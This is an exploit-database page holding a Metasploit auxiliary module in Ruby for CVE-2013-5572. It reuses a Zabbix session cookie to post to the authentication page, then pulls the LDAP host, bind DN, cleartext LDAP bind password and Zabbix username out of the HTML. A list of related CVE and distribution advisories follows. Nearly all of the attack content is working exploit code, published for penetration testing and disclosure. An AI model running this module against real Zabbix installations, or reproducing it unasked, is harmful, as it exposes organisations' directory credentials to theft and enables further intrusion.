Lucene search
Pablo GonzálezEXPLOITPACK:767187964EA9143090213714AAA7FCCFHistoryFeb 23, 2015 - 12:00 a.m.
Zabbix 2.0.5 - Cleartext ldap_bind_Password Password Disclosure (Metasploit)
2015-02-2300:00:00
Pablo González
16
0.01 Low
EPSS
Percentile
83.4%
Zabbix 2.0.5 - Cleartext ldap_bind_Password Password Disclosure (Metasploit)
##
# This module requires Metasploit
# Date: 25-09-2013
# Author: Pablo González
# Vendor Homepage: Zabbix -> http://www.zabbix.com
# Software Link: http://www.zabbix.com
# Version: 2.0.5
# Tested On: Linux (Ubuntu, Suse, CentOS)
# CVE: CVE-2013-5572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5572
# More Info: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5572
# http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html
# http://seclists.org/fulldisclosure/2013/Sep/151
# http://www.cvedetails.com/cve/CVE-2013-5572/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'ldap_bind_password Zabbix CVE-2013-5572',
'Description' => %q{
Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bind password by leveraging management-console access and reading the ldap_bind_password value in the HTML source code.
},
'License' => MSF_LICENSE,
'Author' => [ '@pablogonzalezpe, Pablo Gonzalez' ]
))
register_options([
OptString.new('zbx_session', [true, 'Cookie zbx_sessionid']),
OptString.new('TARGETURI', [true, 'Path Zabbix Authentication','/zabbix/authentication.php']),
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
], self.class)
end
def run
req
end
def req
resp = send_request_cgi(
{
'host' => datastore['RHOST'],
'method' => 'POST',
'uri' => normalize_uri(target_uri.path.to_s),
'cookie' => "zbx_sessionid=#{datastore['zbx_session']}",
'content-type' => 'application/x-www-form-urlencoded'
}, datastore['TIMEOUT'])
ldap_host(resp)
user_passDomain(resp)
user_zabbix(resp)
end
def ldap_host(response)
cut = response.body.split("ldap_host\" value=\"")[1]
if cut != nil
host = cut.split("\"")[0]
print_good "LDAP Host => #{host}"
end
end
def user_passDomain(response)
cut = response.body.split("ldap_bind_dn\" value=\"")[1]
if cut != nil
user = cut.split("\"")[0]
print_good "User Domain? => #{user}"
end
cut = response.body.split("name=\"ldap_bind_password\" value=\"")[1]
if cut != nil
pass = cut.split("\"")[0]
print_good "Password Domain? => #{pass}"
end
end
def user_zabbix(response)
cut = response.body.split("user\" value=\"")[1]
if cut != nil
user = cut.split("\"")[0]
print_good "User Zabbix => #{user}"
end
end
endRelated
packetstorm
packetstorm
Zabbix 2.0.5 Password Disclosure
2015-02-23 00:00:00
cvelist
cvelist
CVE-2013-5572
2013-10-01 01:00:00
cve
cve
CVE-2013-5572
2013-10-01 03:48:24
prion
prion
Code injection
2013-10-01 03:48:00
zdt
zdt
ubuntucve
ubuntucve
CVE-2013-5572
2013-10-01 00:00:00
debiancve
debiancve
CVE-2013-5572
2013-10-01 03:48:24
nvd
nvd
CVE-2013-5572
2013-10-01 03:48:24
exploitdb
exploitdb
Zabbix 2.0.5 - Cleartext ldap_bind_Password Password Disclosure (Metasploit)
2015-02-23 00:00:00
nessus
nessus
Fedora 20 : zabbix-2.0.11-3.fc20 (2014-5540)
2014-05-02 00:00:00
Zabbix < 1.8.20 / 2.0.11 / 2.2.2 Multiple Vulnerabilities
2014-03-03 00:00:00
Fedora 19 : zabbix-2.0.11-3.fc19 (2014-5551)
2014-05-02 00:00:00
mageia
mageia
Updated zabbix packages fix multiple vulnerabilities
2014-02-26 01:31:27
openvas
openvas
Mageia: Security Advisory (MGASA-2014-0095)
2022-01-28 00:00:00
Fedora Update for zabbix FEDORA-2014-5540
2014-05-05 00:00:00
Fedora Update for zabbix FEDORA-2014-5540
2014-05-05 00:00:00
fedora
fedora
[SECURITY] Fedora 20 Update: zabbix-2.0.11-3.fc20
2014-05-01 22:21:14
[SECURITY] Fedora 19 Update: zabbix-2.0.11-3.fc19
2014-05-01 22:20:47
gentoo
gentoo
Zabbix: Multiple vulnerabilities
2013-11-25 00:00:00